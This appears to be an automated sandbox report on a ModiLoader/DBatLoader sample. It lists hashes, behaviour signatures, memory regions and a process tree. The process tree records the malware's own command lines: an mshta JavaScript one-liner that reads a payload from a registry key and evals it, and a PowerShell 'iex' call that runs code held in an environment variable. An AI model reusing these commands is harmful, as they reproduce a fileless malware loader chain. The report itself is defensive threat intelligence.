Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-06-2024 14:27

General

  • Target

    9e817e2a653d2dd0ff7067413c04508c_JaffaCakes118.exe

  • Size

    264KB

  • MD5

    9e817e2a653d2dd0ff7067413c04508c

  • SHA1

    bf3a543152a5554d20f49c2ba2f11101895129f0

  • SHA256

    b4916e08608cc89f83c2d1654b096f1c00d4b2b74da34ecdb39974452dd45594

  • SHA512

    79a02436a75d1968e34a9225e3af77956b6f2d3af298ac789370719a1eb49c80b781b2f5503e698bc8813df9b3255177178d753e663dfbac3e04c272355cb25e

  • SSDEEP

    6144:zN9obtouc5JGLycyqQgQl4TisvG5qwayQ7ShI223F/:59McvMycyqQxGusubaF76I3R

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9e817e2a653d2dd0ff7067413c04508c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9e817e2a653d2dd0ff7067413c04508c_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3188
    • C:\Users\Admin\AppData\Local\Temp\9e817e2a653d2dd0ff7067413c04508c_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9e817e2a653d2dd0ff7067413c04508c_JaffaCakes118.exe"
      2⤵
        PID:1700
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:jX1Od2Iq="4HkIqHl";g5w1=new%20ActiveXObject("WScript.Shell");cMbx2="5W4";N8LqA=g5w1.RegRead("HKLM\\software\\Wow6432Node\\pgKRki\\2OjDVXVWyM");fUW88N="9qFekHTF";eval(N8LqA);Wr9IUa="dBE";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:doofpcyo
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3428

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fruzfna1.qv5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1700-13-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-14-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-9-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-10-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-3-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1700-12-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-11-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-15-0x0000000000650000-0x0000000000726000-memory.dmp
      Filesize

      856KB

    • memory/1700-7-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1700-8-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/3428-33-0x0000000006110000-0x000000000615C000-memory.dmp
      Filesize

      304KB

    • memory/3428-19-0x0000000005310000-0x0000000005332000-memory.dmp
      Filesize

      136KB

    • memory/3428-21-0x0000000005B80000-0x0000000005BE6000-memory.dmp
      Filesize

      408KB

    • memory/3428-20-0x0000000005A20000-0x0000000005A86000-memory.dmp
      Filesize

      408KB

    • memory/3428-35-0x0000000007190000-0x00000000071AA000-memory.dmp
      Filesize

      104KB

    • memory/3428-31-0x0000000005BF0000-0x0000000005F44000-memory.dmp
      Filesize

      3.3MB

    • memory/3428-32-0x00000000060C0000-0x00000000060DE000-memory.dmp
      Filesize

      120KB

    • memory/3428-17-0x0000000004D10000-0x0000000004D46000-memory.dmp
      Filesize

      216KB

    • memory/3428-34-0x00000000077E0000-0x0000000007E5A000-memory.dmp
      Filesize

      6.5MB

    • memory/3428-18-0x0000000005380000-0x00000000059A8000-memory.dmp
      Filesize

      6.2MB